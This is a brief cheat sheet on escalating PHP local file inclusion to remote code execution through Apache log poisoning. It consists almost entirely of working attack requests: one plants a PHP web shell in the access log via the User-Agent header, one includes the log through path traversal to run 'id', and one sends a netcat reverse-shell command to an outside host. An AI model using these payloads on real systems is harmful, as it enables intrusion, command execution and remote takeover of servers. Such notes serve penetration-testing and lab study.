PHP LFI with RCE
Put RCE into log
GET / HTTP/1.1
Host: 11.22.33.44
User-Agent: MozillaHacked<pre><?php echo shell_exec($_REQUEST['cmd']) ?></pre>
RCE - POC
GET http://$IP/index.php?file=../../../../../../../../var/log/apache2/access.log&cmd=id
RCE
POST /index.php?file=../../../../../../../../var/log/apache2/access.log HTTP/1.1
Host: 192.168.240.72:8593
Content-Type: application/x-www-form-urlencoded
cmd=netcat 55.66.77.88 4444 -e /bin/bash